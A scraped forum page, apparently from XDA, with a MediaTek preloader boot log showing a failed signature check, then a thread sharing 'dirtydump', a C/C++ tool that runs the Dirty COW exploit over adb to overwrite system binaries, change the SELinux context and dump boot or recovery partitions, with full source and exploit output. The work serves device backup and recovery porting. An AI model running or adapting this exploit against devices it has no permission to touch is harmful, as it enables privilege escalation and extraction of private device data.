[AUTHEN] rsa.E length = 20 bytes
[LIB] Verify 'UBOOT'
0x43434343
[LIB] part load '0x3960000'
[AUTHEN] 0x53,0x53,0x53,0x53
[AUTHEN] verify signature ... pass
[LIB] Verify 'LOGO'
0x43434343
[LIB] part load '0x4D40000'
[AUTHEN] 0x53,0x53,0x53,0x53
[AUTHEN] verify signature ... failed, error is 7
[SECLIB_IMG_VERIFY] Signature Fail.
[LIB] Fail (0x0)
<ASSERT> sec_boot.c:line 181 0
[PLFM] preloader fatal error...
[PLFM] emergency download mode(timeout: 30s).
mtk_arch_reset at pre-loader!
this is console with serial interface
i will post picture with pin layaut
how to unbrick?
botioni said:
[PWRAP] pwrap_init_preloader
[PWRAP] pwrap_init
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=0 rdata=5AA5
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=1 rdata=5AA5
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=2 rdata=5AA5
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=3 rdata=5AA5
[PMIC_WRAP]wrap_init pass,the return value=0.
pl pmic init start
pl pmic efuse start
pl pmic efuse BUCK trim
[0x1C8]=0xF802
[0x1CA]=0x807F
[0x20E]=0xE0
[0x260]=0xF0
[0x286]=0xF0
pl pmic efuse end
pl pmic en rst [0x126]=0x13
[0xE]=0x1
[0x540]=0xA0
Battery exist
[0xE]=0x1
[0x540]=0xA0
pl vm read [0x290]=0x50
pl vm set [0x290]=0x52
pl vm check [0x290]=0x52
pl pmic init done
[PLFM] Init I2C: OK(0)
[PLFM] Init PWRAP: OK(0)
[PLFM] Init PMIC: OK(0)
[PLFM] chip[CA00]
[I2C][PL] [i2c0 write] i2c transaction complate
[BLDR] Build Time: 20140218-141828
==== Dump RGU Reg ========
RGU MODE: 75
RGU LENGTH: FFE0
RGU STA: 40000000
RGU INTERVAL: FFF
RGU SWSYSRST: 0
==== Dump RGU Reg End ====
RGU: g_rgu_satus:2
mtk_wdt_mode_config mode value=35, tmp:22000030
PL RGU RST: ??
SW reset with bypass power key flag
Find bypass powerkey flag
mtk_wdt_mode_config mode value=70, tmp:22000071
kpd register for pmic set!
mt_usb_calibraion: input_reg = 0x0
mt_usb_calibraion: term_vref = 0x0, clkref = 0x0, vrt_vref = 0x0,
[RTC] bbpu = 0x5, con = 0x426
[RTC] irqsta = 0x0, pdn1 = 0x0, pdn2 = 0x201, spar0 = 0x40, spar1 = 0x800
[RTC] new_spare0 = 0x0, new_spare1 = 0x1, new_spare2 = 0x1, new_spare3 = 0x1
[RTC] bbpu = 0x5, con = 0x424
SW reset with bypass power key flag
SW reset with bypass power key flag
[PLFM] WDT reboot bypass power key!
p1 pmic read INT_RSV(bit7)[0x138][0x80]
[RTC] rtc_bbpu_power_on done
[SD0] Bus Width: 1
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(0) DDR(0) DIV(193) DS(0) RS(0)
[SD0] Switch to High-Speed mode!
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(2) DDR(1) DIV(96) DS(0) RS(0)
[SD0] Bus Width: 8
[SD0] Size: 3696 MB, Max.Speed: 52000 kHz, blklen(512), nblks(7569408), ro(0)
[SD0] Initialized
[SD0] SET_CLK(52000kHz): SCLK(50000kHz) MODE(2) DDR(1) DIV(0) DS(0) RS(0)
msdc_ett_offline_to_pl: size<2> m_id<0x90>
msdc <0> <HYNIX > <H4G1d>
msdc <1> <xxxxxx> <H4G1d>
msdc failed to find
*******EMMC_INFO*******
eMMC partition size(1 block = 512Bytes):
BOOT1:<4096> blocks
BOOT2:<4096> blocks
RPMB :<4096> blocks
GP1 :<0> blocks
GP2 :<0> blocks
GP3 :<0> blocks
GP4 :<0> blocks
USER :<7569408> blocks
*******EMMC_INFO*******
fw id len:1
found:1,i:1
[EMI] DDR2
[EMI] eMMC/NAND ID = 90,1,4A,48,34,47,31,64,4
[EMI] MDL number = 1
[MEM] 1066 MHZ
rank 0 coarse = 15
rank 0 fine = 48
10:| 0 0 1 1 1 0
opt_dle value:8
rank 1 coarse = 15
rank 1 fine = 48
10:| 0 0 1 1 1 0
opt_dle value:8
byte:0, (DQS,DQ)=(8,8)
byte:1, (DQS,DQ)=(8,A)
byte:2, (DQS,DQ)=(8,8)
byte:3, (DQS,DQ)=(8,A)
[EMI] DRAMC calibration passed
[EMI] DQSINCTL:50000
[MEM] complex R/W mem test pass
[PLFM] Init Boot Device: OK(0)
[ROM_INFO] 'v2','0x2700000','0x20000','0x46C0000','0x2C00'
[SEC_K] SML KEY AC = 0
[SEC_K] SBC_PUBK Found
[SEC] AES Legacy : 0
[SEC] SECCFG AC : 1
[SEC] read '0x2700000'
0x41,0x4E,0x44,0x5F,0x53,0x45,0x43,0x43,
[LIB] SecLib.a '20121226-155014'
[LIB] CFG read size '0x4000' '0x1860'
[LIB] Name = SOMC
[LIB] Config = 0x11, 0x11
0x31,0x41,0x35,0x35
0x6F679858
[LIB] HW DEC
0x49494949
[LIB] SEC CFG 'v3' exists
[LIB] Status = 0x43434343
[LIB] ty = 0 , ld = 0
[PART] Image with part header
[PART] name : LK
[PART] addr : FFFFFFFFh
[PART] size : 316772
[PART] magic: 58881688h
[PART] load "UBOOT" from 0x0000000003960200 (dev) to 0x81E00000 (mem) [SUCCESS]
[PART] load speed: 9374KB/s, 316772 bytes, 33ms
[LIB] HW DEC
[SECRO] secroimg '0x41414141'
[SECRO] secroimg '0x35353535'
[SECRO] factory mode enabled
[AUTHEN] rsa.N length = 1024 bytes
[AUTHEN] rsa.E length = 20 bytes
[LIB] Verify 'UBOOT'
0x43434343
[LIB] part load '0x3960000'
[AUTHEN] 0x53,0x53,0x53,0x53
[AUTHEN] verify signature ... pass
[LIB] Verify 'LOGO'
0x43434343
[LIB] part load '0x4D40000'
[AUTHEN] 0x53,0x53,0x53,0x53
[AUTHEN] verify signature ... failed, error is 7
[SECLIB_IMG_VERIFY] Signature Fail.
[LIB] Fail (0x0)
<ASSERT> sec_boot.c:line 181 0
[PLFM] preloader fatal error...
[PLFM] emergency download mode(timeout: 30s).
mtk_arch_reset at pre-loader!
this is console with serial interface
i will post picture with pin layaut
Click to expand...
Click to collapse
how did you check this out?
theonecallednick said:
how did you check this out?
Click to expand...
Click to collapse
I found uart pin on mainboard for debuging .
with serial usb cable pl2303
This is the red light only and unknown hardware found (the unknown hardware is in fact mtk usb vcom driver buth sony version ) if you try sp flash tool for mtk then it comunicates with de phone buth it needs some authentication file.
Help..
I am also having same problem..I falshed wrong rom..
It just shows red led and does not detects by PC...
Were you able to solve the problem..if yes..please help..
botioni said:
[PWRAP] pwrap_init_preloader
[PWRAP] pwrap_init
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=0 rdata=5AA5
.........................
this is console with serial interface
i will post picture with pin layaut
Click to expand...
Click to collapse
Samuel Wankhede said:
I am also having same problem..I falshed wrong rom..
It just shows red led and does not detects by PC...
Were you able to solve the problem..if yes..please help..
Click to expand...
Click to collapse
Try the guide given in thread linked below
http://forum.xda-developers.com/showpost.php?p=57614511&postcount=13
Please share uart pinout
Baudrate should be 115200??
Thanks
uart
please share the uart pinout , thanks

[TOOL-TESTING] dirtydump (a way to dump boot or recovery for every un-rooted device)

Hi,
A little tool or frontend that I've made and share to the community.
Intro
If you are like me :
Searching a way to backup your device, try some tools like SP Flash Tool, or MTK Droid Tools (for generating a Scatter File).
I have found a lot of thread, but I've allways got a dead end or a risk to brick the device (Never take a risk to brick your device if no stock rom available or backup).
A few days ago, i've found this thread : https://forum.xda-developers.com/v20/development/h918-recowvery-unlock-v20-root-shell-t3490594
It's not for my device, it's maybe not for your device, but help a lot to do our need. This exploit work for everyone and what to do the little tools below.
What's the change ?
Instead of that does jcadduono (a big thanks to him), via applypatch, it don't patch the recovery partition to run an Android in Permissive mode, my applypatch only open and read the boot or recovery partition and display all data to logging (binary converted to hex value).
Yes, I know, logging is not for that, it's realy hard-core, but it's the only way working. I've tried with socket, but SELinux in Enforced mode don't allow this.
You can see my recowvery-applypatch.c below :
Code:
#include <unistd.h>
#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <time.h>
#include <fcntl.h>
#include <sys/stat.h>
#define APP_NAME "recowvery"
#define HOST_NAME "applypatch"
#ifdef DEBUG
#include <android/log.h>
#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, APP_NAME, __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); }
#define LOGE(...) { __android_log_print(ANDROID_LOG_ERROR, APP_NAME, __VA_ARGS__); fprintf(stderr, __VA_ARGS__); fprintf(stderr, "\n"); }
#else
#define LOGV(...) { printf(__VA_ARGS__); printf("\n"); }
#define LOGE(...) { fprintf(stderr, __VA_ARGS__); fprintf(stderr, "\n"); }
#endif
#define SEP LOGV("------------")
#include "bootimg.h"
/* Time delay in microsecond for next loop (1000 = 1ms)
* 250 is good for every PC
* (you can try with 0 to boost the process, but you can have an <unexpected EOF>)
*/
#define DELAY_T 250
void delay(long t)
{
if (t == 0)
return;
long timens = t * 1000;
nanosleep((const struct timespec[]){{0, timens}}, NULL);
}
/*
* Search in *str the word *word.
* &rslt => Result, a sort of substr version of *str from 0 to the last char of the searched *word if found.
* &len => Length of &rslt.
*
* Return 0 if found or -1 if not found.
* (A substr like)
*/
int findStr(char *str, char *word, char** rslt, int* len)
{
int i = 0;
int j = 0;
int allmatch = 0;
char *temp;
*len = 0;
for (i = 0; i < (int)strlen(str); i++)
{
if (str[i] == word[0])
{
allmatch = 0;
for (j = 0; j < (int)strlen(word); j++)
{
if (str[i + j] != word[j])
{
allmatch = 1;
break;
}
}
if (allmatch == 0)
{
*len = i + strlen(word);
break;
}
}
}
if (*len != 0)
{
temp = malloc(*len);
for (i = 0; i < *len; i++)
temp[i] = str[i];
*rslt = temp;
return 0;
}
return -1;
}
/*
* run "mount" and find "/by-name/" from result.
* if matched, fill path var
* return 0 if success else -1
*/
int getBlockDevice(char** path)
{
FILE* cmd;
char br[512];
char* search = "/by-name/";
char* tmp;
int slength = 0;
cmd = popen("mount 2>&1", "r");
if (cmd)
{
/* Read result and try to find the first corresponding mount point */
while(fgets(br, sizeof br, cmd) != NULL)
{
/* If found, log the result */
if (findStr(br, search, &tmp, &slength) != -1)
{
/* Append "boot" (your can replace this by "recovery", "system") at the end */
sprintf(*path, "%srecovery", tmp);
break;
}
}
fclose(cmd);
}
else
{
LOGE("ERROR Getting filesystem mountpoint");
}
if (slength > 0)
return 0;
else
return -1;
}
int main(int argc, char **argv)
{
int ret = 0;
int i = 0;
LOGV("Welcome to %s! (%s)", APP_NAME, HOST_NAME);
char *blockDev = malloc(256);
if (getBlockDevice(&blockDev) == -1)
{
LOGE("ERROR : Could not find FileSystem mount point.");
ret = errno;
goto oops;
}
else
{
LOGV("BLOCK_DEVICE : %s", blockDev);
SEP;
}
/*
* Sometimes <applypatch> run before <dirtycow> finish its process that cause our device not ready to start <adb logcat -s recowvery>
* and we have to wait more than 3min...
* A little sleep of 30 sec ensure that our device is ready.
*/
LOGV("The process start in 30s");
sleep(30);
byte rb[32];
char *content = malloc(256);
FILE *fp;
size_t nread;
fp = fopen(blockDev, "r");
if (fp) {
LOGV("*** DUMP START ***");
while ((nread = fread(rb, 1, sizeof rb, fp)) > 0)
{
sprintf(content, "HEXDUMP = [");
for (i = 0; i < (int)nread; i++)
{
if (i == 0)
sprintf(content, "%s%.2x", content, rb[i]);
else
sprintf(content, "%s,%.2x", content, rb[i]);
}
sprintf(content, "%s];", content);
LOGV("%s", content);
/* sleep to prevent any unexpected EOF with with pipe stream */
delay(DELAY_T);
}
if (ferror(fp)) {
ret = errno;
LOGE("*** DUMP ERROR ***");
LOGE("Error while reading the file...");
}
LOGV("*** DUMP END ***");
fclose(fp);
}
else
{
LOGV("Can't read the file...");
ret = errno;
goto oops;
}
return 0;
oops:
LOGE("*** DUMP ERROR ***");
LOGE("Error %d: %s", ret, strerror(ret));
LOGE("Exiting...");
return ret;
}
Don't laugh please, I am very new in C
Ok, but about the tool ?
The tool is a frontend and easy to use, it copy exploit files for you, run exploit, read logging from adb and do the revert of applypatch (Convert hex to binary and write them to the image file) and finaly reboot your device when it's finish.
An example here :
Code:
~/Documents/dirtydump/bin/Debug$ ./dirtydump boot
***************
**** Init *****
***************
adb push ./bin/dirtycow /data/local/tmp
159 KB/s (9984 bytes in 0.061s)
adb push ./bin/recowvery-applypatch_boot /data/local/tmp
234 KB/s (10200 bytes in 0.042s)
adb push ./bin/recowvery-applypatch_recovery /data/local/tmp
238 KB/s (10200 bytes in 0.041s)
adb push ./bin/recowvery-app_process64 /data/local/tmp
240 KB/s (10200 bytes in 0.041s)
adb push ./bin/recowvery-app_process32 /data/local/tmp
411 KB/s (17992 bytes in 0.042s)
adb shell chmod 0777 /data/local/tmp/dirtycow
adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_boot
adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_recovery
adb shell chmod 0777 /data/local/tmp/recowvery-app_process64
adb shell chmod 0777 /data/local/tmp/recowvery-app_process32
* Android x64 version detected.
**********************
**** Run Exploit *****
**********************
adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_boot
warning: new file size (10200) and file old size (74712) differ
size 74712
[*] mmap 0x7faa6a7000
[*] exploit (patch)
[*] currently 0x7faa6a7000=10102464c457f
[*] madvise = 0x7faa6a7000 74712
[*] madvise = 0 1048576
[*] /proc/self/mem 1031798784 1048576
[*] exploited 0x7faa6a7000=10102464c457f
adb shell /data/local/tmp/dirtycow /system/bin/app_process64 /data/local/tmp/recowvery-app_process64
warning: new file size (10200) and file old size (22456) differ
size 22456
[*] mmap 0x7f8f303000
[*] exploit (patch)
[*] currently 0x7f8f303000=10102464c457f
[*] madvise = 0x7f8f303000 22456
[*] madvise = 0 1048576
[*] /proc/self/mem 2071986176 1048576
[*] exploited 0x7f8f303000=10102464c457f
*********************************
**** adb logcat -s recowvery ****
*********************************
--------- beginning of main
--------- beginning of system
--------- beginning of crash
01-24 15:40:37.206 5266 5266 I recowvery: Welcome to recowvery! (app_process64)
01-24 15:40:37.206 5266 5266 I recowvery: ------------
01-24 15:40:37.206 5266 5266 I recowvery: Current selinux context: u:r:zygote:s0
01-24 15:40:37.206 5266 5266 I recowvery: Set context to 'u:r:system_server:s0'
01-24 15:40:37.206 5266 5266 I recowvery: Current security context: u:r:system_server:s0
01-24 15:40:37.206 5266 5266 I recowvery: Setting property 'ctl.start' to 'flash_recovery'
01-24 15:40:37.211 5266 5266 I recowvery: ------------
01-24 15:40:37.211 5266 5266 I recowvery: Recovery flash script should have started!
01-24 15:40:37.211 5266 5266 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery
01-24 15:40:37.211 5266 5266 I recowvery: Waiting 3 minutes to try again (in case it didn't start or you forgot to dirtycow applypatch first)...
01-24 15:40:37.242 5269 5269 I recowvery: Welcome to recowvery! (applypatch)
01-24 15:40:37.272 5269 5269 I recowvery: BLOCK_DEVICE : /dev/block/platform/mtk-msdc.0/11230000.msdc0/by-name/boot
01-24 15:40:37.272 5269 5269 I recowvery: ------------
01-24 15:40:37.272 5269 5269 I recowvery: The process start in 30s
Start writing to file...
Block read : 524288 (Size : 16777216)
Finish
Image file saved here :
./boot.img
Rebooting your device...
************************
**** Reboot Device *****
************************
How to use ?
Extract all files from archive attached below in a directory of our choice.
./dirtydump boot : dump boot partition and store it to ./boot.img
./dirtydump recovery : dump recovery partition and store it to ./recovery.img
When all done, you have all to make your Custom Recovery for your device.
Requirements
<dirtycow> capable device.
Working adb (adb devices to check)
Linux distribution.
Source code
Code:
#include <iostream>
#include <stdio.h>
#include <regex>
using namespace std;
#define BOOT 0
#define RECOVERY 1
#define ANDROID_64 "64"
#define ANDROID_32 "32"
#ifdef __linux__
#define DIRECTORY_SEPARATOR "/"
#elif __APPLE__
#define DIRECTORY_SEPARATOR "/"
#else
#define DIRECTORY_SEPARATOR "\\"
#endif
typedef unsigned char byte;
static string appDirectory;
static string arch;
static FILE *fsout;
static bool startwrite = false;
static int ncrash = 0;
static int nBlock = 0;
static long currentSize = 0;
// Shorter regex is possible, but I prefer like that.
static regex rs("^.+I recowvery: (\\*\\*\\* DUMP START \\*\\*\\*)\\s+"); // Used to start writting binary file
static regex rl("^.+I recowvery: HEXDUMP = \\[([^\\]]+)\\];\\s+"); // Used to match all data block, and populate < datalist >
static regex rf("^.+I recowvery: (\\*\\*\\* DUMP END \\*\\*\\*)\\s+"); // Used to end writting, and exit infinit loop
static regex re("^.+I recowvery: (\\*\\*\\* DUMP ERROR \\*\\*\\*)\\s+"); // Used to intercept error from < recowvery-applypatch >
static regex radbe("^error:(.+)\\s+"); // ADB cmd error
static regex rarch("^.+(aarch64).*\\s+"); // Get arch from <uname -a>
/**
* Run command
* return : 0 if success else -1 if error
**/
int runcmd(string cmd)
{
char rslt[256];
int cmdv = 0;
FILE *fc = popen(cmd.c_str(), "r");
/* Redirect stderr to stdout */
cmd.append(" 2>&1");
// To remove the \n or \r\n at the end.
regex rcmdline("^(.+)\\s+");
if (fc)
{
while (fgets(rslt, sizeof rslt, fc) != NULL)
{
if (regex_match(string(rslt), rcmdline))
cout << regex_replace(string(rslt), rcmdline, "$1") << endl;
// If error matched, return -1
if (regex_match(rslt, radbe))
{
cmdv = -1;
break;
}
}
cout << endl;
fclose(fc);
}
else
{
cerr << "Error running '" << string(cmd) << "'" << endl;
return -1;
}
return cmdv;
}
/**
* Used to split string
* s : string to split (in)
* delim : used char for split (in)
* elems : string array result (out)
**/
void split(const string &s, char delim, vector<string> &elems) {
stringstream ss;
ss.str(s);
string item;
while (getline(ss, item, delim)) {
elems.push_back(item);
}
}
/**
* Used to split string
* s : string to split (in)
* delim : char delimeter (in)
* return : vector string
**/
vector<string> split(const string &s, char delim) {
vector<string> elems;
split(s, delim, elems);
return elems;
}
/** Convert hex string to byte array **/
void string_to_bytearray(std::string str, unsigned char* &array, int& size)
{
int length = str.length();
// make sure the input string has an even digit numbers
if(length%2 == 1)
{
str = "0" + str;
length++;
}
// allocate memory for the output array
array = new unsigned char[length/2];
size = length/2;
std::stringstream sstr(str);
for(int i=0; i < size; i++)
{
char ch1, ch2;
sstr >> ch1 >> ch2;
int dig1, dig2;
if(isdigit(ch1)) dig1 = ch1 - '0';
else if(ch1>='A' && ch1<='F') dig1 = ch1 - 'A' + 10;
else if(ch1>='a' && ch1<='f') dig1 = ch1 - 'a' + 10;
if(isdigit(ch2)) dig2 = ch2 - '0';
else if(ch2>='A' && ch2<='F') dig2 = ch2 - 'A' + 10;
else if(ch2>='a' && ch2<='f') dig2 = ch2 - 'a' + 10;
array[i] = dig1*16 + dig2;
}
}
/**
* Get architecture type
* Run <adb shell uname -a> and find the word : aarch64
* If found return <ANDROID_64> else <ANDROID_32>
**/
string getArchType()
{
char rslt[256];
string val;
FILE *fc = popen("adb shell uname -a", "r");
// To remove the \n or \r\n at the end.
if (fc)
{
while (fgets(rslt, sizeof rslt, fc) != NULL)
{
if (regex_match(string(rslt), rarch))
{
cout << "* Android x64 version detected." << endl;
val = string(ANDROID_64);
}
else
{
cout << "* Android x32 version detected." << endl;
val = string(ANDROID_32);
}
}
cout << endl;
fclose(fc);
}
else
{
cerr << "Error running 'adb shell uname -a'" << endl;
}
return val;
}
/**
* Display help
**/
void help()
{
cout << "dirtydump boot | recovery" << endl;
cout << "Usage :" << endl;
cout << "\tdirtydump boot : Dump device boot partition and save it to boot.img." << endl;
cout << "\tdirtydump recovery : Dump device recovery partition and save it to recovery.img." << endl << endl;
cout << "Information :" << endl;
cout << "\tThis app use the same exploit explained here : " << endl;
cout << "\thttps://github.com/jcadduono/android_external_dirtycow" << endl;
cout << "\tThe only difference is by the <applypatch>, instead of patching," << endl;
cout << "\tit read your boot / recovery partition." << endl;
cout << "\tConvert all data to hex value, and display it." << endl;
cout << "\tDuring the process, the app read all data through" <<endl;
cout << "\t<adb logcat -s recowvery> and do the reverse," << endl;
cout << "\tconvert all hex value to binary, and write it to a file." << endl;
cout << "\tBecause your device is like crashing, this app reboot" << endl;
cout << "\tautomaticaly when the process is finished." << endl;
cout << endl;
}
/**
* Initialize process.
* Push required files to your device and apply a chmod to them and exit.
**/
int init()
{
cout << "***************" << endl;
cout << "**** Init *****" << endl;
cout << "***************" << endl << endl;
string files[] = {"dirtycow",
"recowvery-applypatch_boot",
"recowvery-applypatch_recovery",
"recowvery-app_process64",
"recowvery-app_process32"};
string cmdlist[] = {"adb shell chmod 0777 /data/local/tmp/dirtycow",
"adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_boot",
"adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_recovery",
"adb shell chmod 0777 /data/local/tmp/recowvery-app_process64",
"adb shell chmod 0777 /data/local/tmp/recowvery-app_process32"};
char cmd[128];
/* Push files to the device */
for(auto s : files)
{
sprintf(cmd, "adb push %s%sbin%s%s /data/local/tmp", appDirectory.c_str(), DIRECTORY_SEPARATOR, DIRECTORY_SEPARATOR, s.c_str());
cout << string(cmd) << endl;
if (runcmd(cmd) != 0)
return -1;
}
/* Apply chmod to the pushed files */
for(auto s : cmdlist)
{
cout << string(s) << endl;
if (runcmd(s) != 0)
return -1;
}
arch = getArchType();
if (arch.empty())
return -1;
return 0;
}
/**
* Apply exploit to applypatch (for boot or process) and app_process64
**/
int runExploit(int v)
{
cout << "**********************" << endl;
cout << "**** Run Exploit *****" << endl;
cout << "**********************" << endl << endl;
string cmdlist[] = {
"", // For applypatch
"" // For app_process
};
if (v == BOOT)
cmdlist[0].append("adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_boot");
else if (v == RECOVERY)
cmdlist[0].append("adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_recovery");
else
return -1;
if (arch == ANDROID_64)
cmdlist[1] = "adb shell /data/local/tmp/dirtycow /system/bin/app_process64 /data/local/tmp/recowvery-app_process64";
else
cmdlist[1] = "adb shell /data/local/tmp/dirtycow /system/bin/app_process32 /data/local/tmp/recowvery-app_process32";
for(auto s : cmdlist)
{
cout << s << endl;
if (runcmd(s) != 0)
return -1;
}
return 0;
}
/**
* reboot device from adb
**/
int rebootDevice()
{
cout << "************************" << endl;
cout << "**** Reboot Device *****" << endl;
cout << "************************" << endl << endl;
return runcmd(string("adb reboot"));
}
/**
* Function that do the stuff
* If a line contain *** DUMP START *** it start to get all hex value in HEXDUMP = [a1,e2,b4,ect.] and convert to binary before writing to output file.
* All other line are :
* <*** DUMP ERROR ***> : Error during the process, or your device is disconnected, no more battery...
* <*** DUMP END ***> : Dumping is end / end of process.
* <Other lines> : Displayed
**/
int displayLogAndConvertData(string line)
{
/**
* If an unexpected EOF from recowvery-applypatch or if no <pipe>...
* We can't receive a null string, so break the loop, close fsout, and exit the program.
**/
if (line.empty())
{
cout << string("* < null > received !") << endl;
cout << string("Try again...") << endl;
return -1;
}
/**
* *** DUMP START ***
* set startwrite = true to write parsed data to fsout
**/
if (regex_match(line, rs))
{
startwrite = true;
cout << "Start writing to file..." << endl;
}
/**
* Parse all string received if match
* Note :
* It's possible to have matched string before intercept DUMP START,
* If we convert now, it's a good idea to have a broken output file.
**/
if (startwrite && regex_match(line, rl))
{
string s = regex_replace(line, rl, "$1");
vector<string> data = split(s, ',');
for (int c = 0; c < (int)data.size(); c++)
{
try
{
byte *b = NULL;
int sb;
string_to_bytearray(data[c], b, sb);
fwrite(b, 1, sb, fsout);
}
catch (const exception &ex)
{
cout << endl;
cout << string("** Exception **") << endl;
cout << string(" - When convert : ") << data[c] << endl;
cout << string(" - Message : ") << ex.what() << endl;
}
}
nBlock++;
currentSize = nBlock * 32;
cout << "\r";
cout << "Block read : " << nBlock << " (Size : " << currentSize << ")";
}
/**
* Display the other lines (for debuging, logging...)
**/
else if (!regex_match(line, rl) && (!regex_match(line, rf) && !startwrite) && line.length() > 1)
{
cout << line;
}
/**
* *** DUMP END ***
* Flush and close fsout, inform the user, and break the loop.
**/
if (startwrite && regex_match(line, rf))
{
cout << endl << "Finish" << endl;
startwrite = false;
return 1;
}
/**
* *** DUMP ERROR ***
* An error intercepted from ADB, close fsout, set start to false.
* < applypatch > will restart every 3 min.
* We break the loop after 3 errors.
**/
if (regex_match(line, re))
{
cout << std::string("* Error received from ADB *") << std::endl;
startwrite = false;
if (ncrash == 3)
{
cout << std::string("* Too many tries, please check your < recowvery-applypatch.c > and try again.") << std::endl;
return -1;
}
cout << std::string("* Be patient, recowvery-applypatch will restart in a few minutes.") << std::endl;
ncrash++;
}
return 0;
}
/**
* run <adb logcat -s recowvery> and send line by line to <displayLogAndConvertData> function
**/
int readFromLogcat()
{
cout << "*********************************" << endl;
cout << "**** adb logcat -s recowvery ****" << endl;
cout << "*********************************" << endl << endl;
char buff[1024];
int prc = 0;
FILE *fc = popen("adb logcat -s recowvery", "r");
if (fc)
{
while(fgets(buff, sizeof buff, fc) != NULL)
{
prc = displayLogAndConvertData(string(buff));
// Error occuring
if (prc == -1)
{
cerr << "Error during the process !" << endl;
break;
}
// Process finished
if (prc == 1)
break;
}
/*
* When finish or an error received from adb, <startwrite> is set to false.
* If set to true, a NULL string has been received before receiving a DUMP_END or DUMP_ERROR.
* So, so we display an error.
*/
if (startwrite)
{
cerr << "Error during the process !" << endl;
prc = errno;
}
fclose(fc);
}
else
{
cerr << "Error running <adb logcat -s recowvery" << endl;
}
return prc;
}
/** main **/
int main(int argc, char** argv)
{
int ret = 0;
string filename;
if (argc == 1)
{
help();
return ret;
}
/* Fix for windows
* If run in same directory as the exe, return only the exe name without folder where it run.
* So, if DIRECTORY_SEPARATOR not found in argv_str, appDirectory = "." for linux, mac and windows
*/
string argv_str(argv[0]);
if (argv_str.find_last_of(DIRECTORY_SEPARATOR) != string::npos)
appDirectory = argv_str.substr(0, argv_str.find_last_of(DIRECTORY_SEPARATOR));
else
appDirectory = string(".");
ret = init();
if (ret != 0)
return ret;
if (string(argv[1]) == "boot")
{
ret = runExploit(BOOT);
filename = "boot.img";
}
else
{
ret = runExploit(RECOVERY);
filename = "recovery.img";
}
if (ret != 0)
return ret;
else
{
fsout = fopen(filename.c_str(), "wb");
if (!fsout)
{
cerr << "Can't open or create file : <" << string(filename) << ">" << endl;
rebootDevice();
return errno;
}
else
{
ret = readFromLogcat();
fclose(fsout);
}
cout << endl;
cout << "Image file saved here :" << endl;
cout << " " << appDirectory << string(DIRECTORY_SEPARATOR) << string(filename) << endl;
cout << endl;
}
cout << "Rebooting your device..." << endl;
ret = rebootDevice();
return ret;
}
Note :
There is only linux binary, the windows version come soon.
(I don't know why Windows don't work as expected :x)
If you are interested by the source code, I can attach it.
Tested and build from Ubuntu 16.04 (x64) / Code::Blocks & gedit.
If any bug, I will do the best to solve this.
So sorry for my english, or any misspelling :x
Hey man great work
I was in need of such a tool
I needed the recovery partition for andromax x58
Though I dont own the phone its for someone(yeah you understand it right)
And now finally ported Twrp to it
please make compatible for 32 bit device
Hi,
Normaly, it may work for 32bit device, but can't test it :/
Can you give me error log, text displayed on your terminal please ?
And if possible, what do you have when you do : "adb shell uname -a" ? (because I detect 32 or 64bits device by this)
Regards,
Vincent
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Ricky Divjakovski said:
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Click to expand...
Click to collapse
The boss Appear.What a pleasant thing it is.
China user
Ricky Divjakovski said:
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Click to expand...
Click to collapse
Hi and sorry for the time to answer...
I've added the source code at the end of the first post
The Hard Gamer said:
Hey man great work
I was in need of such a tool
I needed the recovery partition for andromax x58
Though I dont own the phone its for someone(yeah you understand it right)
And now finally ported Twrp to it
Click to expand...
Click to collapse
Hai Bro,what command you issue in linux to run ?
Thks
Hmm this is awesome except the part it doesn't work on Ubuntu 14.04 and source code need gcc-4.9 to build (not sure).
Anyway I will install Ubuntu 16.04 to make new things to LG K4 (2016) [MTK MT6735m], good job thanks for it
@Vince_02100 what compilers did you used to applypatch and app_process64?
I need to compile a version to armv7(aka 32), since my current device (the LG K4) have a x32 Android and a x64 CPU.
I'm improving your dirtydump but with limitations since I don't know much about C/C++.
Please reply or PM me, anyway I will try my best to make it x32 support
@Vince_02100
My question is, did you base the operation of your tool on the dirtycow exploit? Seems like it because of its name and reference to jcadduono.
This is actually awesome then because I have a tool very similar only it works as a shell command handler. The Greyhat Root Console essentially is it's own Terminal Interface specifically to use dirtycow for root shell commands.
I only bring that up because Stock OEM builds that are dated October 2016 or later pretty much can't utilize CVE-2016-5195. Some didn't get patched that soon but most did. The rule of thumb I've always had when working with Dirtycow is to use stock builds from September 2016. Since they are the most up to date builds still vulnerable. I don't know how many people reading this thread know that.
Here is the thread I made where @droidvoider explains how to use the Greyhat Root Console: https://forum.xda-developers.com/android/help/injecting-root-setting-selinux-stages-t3573036
The thread also details our journey into modifying the Device SEPolicy using the console in order to elevate our normal user privileges. We have the instructions to build the Console for both 32-Bit and 64-Bit Builds of Android 5.1.1 & 6.0.1
I think the source code and our thread may just give you some good insight going forward with your tool, even though The Greyhat Root Console was developed on an AT&T Galaxy Note 5. That thread is a gold mine for dirtycow information.
Thanks for your great tool and explanation @Vince_02100. I'm researching to dump boot, recovery for Onkyo DP-CMX1 to make custom TWRP. I have some stupid questions and need your help like following:
1. Tool will not break system partition and it can boot normally after dumping recovery, boot?
2. I don't have root so how can I copy dumped files: ./boot.img , ./recovery.img to /sdcard or to computer? Do I edit your code
